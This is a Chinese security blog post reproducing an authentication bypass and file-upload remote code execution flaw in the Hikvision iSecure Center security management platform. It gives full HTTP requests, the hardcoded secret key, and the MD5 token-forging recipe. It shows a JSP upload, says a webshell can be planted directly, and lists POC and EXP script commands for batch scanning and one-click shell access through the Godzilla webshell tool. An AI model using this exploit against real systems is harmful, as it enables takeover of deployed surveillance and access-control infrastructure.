声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,海底生残月及文章作者不为此承担任何责任。现在只对常读和星标的公众号才展示大图推送,建议大家能把海底生残月“设为星标”,否则可能就看不到了啦!
最近比赛碰到这玩意,来记录一下吧
0x01 工具介绍
HIKVISION iSecure
Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,公众号:web安全工具库,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION
iSecure
Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
0x02 影响范围
HIKVISION iSecure Center综合安防管理平台
0x03 漏洞复现
访问存在漏洞的网站,抓包,然后去访问/eps/api/resourceOperations/upload POST /eps/api/resourceOperations/upload HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://you-ip Connection: close Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9 Upgrade-Insecure-Requests: 1 Content-Length: 62
service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action
构造token绕过认证(内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证) secretkey是代码里写死的(默认值:secretKeyIbuilding) token值需要进行MD5加密(32位大写)
组合: token=MD5(url+“secretKeyIbuilding”)
返回200 即OK 上传一个jsp 显示上传成功且返回了resourceUuid值 验证路径:http://url/eps/upload/resourceUuid的值.jsp POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988 Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo Upgrade-Insecure-Requests: 1 Content-Length: 174 ------WebKitFormBoundaryGEJwiloiPo Content-Disposition: form-data; name='fileUploader';filename='1.jsp' Content-Type: image/jpeg test ------WebKitFormBoundaryGEJwiloiPo
可直接写马利用 0x04 工具复现
poc采用无害化扫描检测,无文件残留,可批量检测;exp只做单个url攻击,一键shell。
POC:
python '.\iSecure-Center-RCE_POC.py' -f .\url.txt -t 10
EXP:
python '.\iSecure-Center-RCE_EXP.py' -u http://127.0.0.1
一键上传后通过哥斯拉连接
|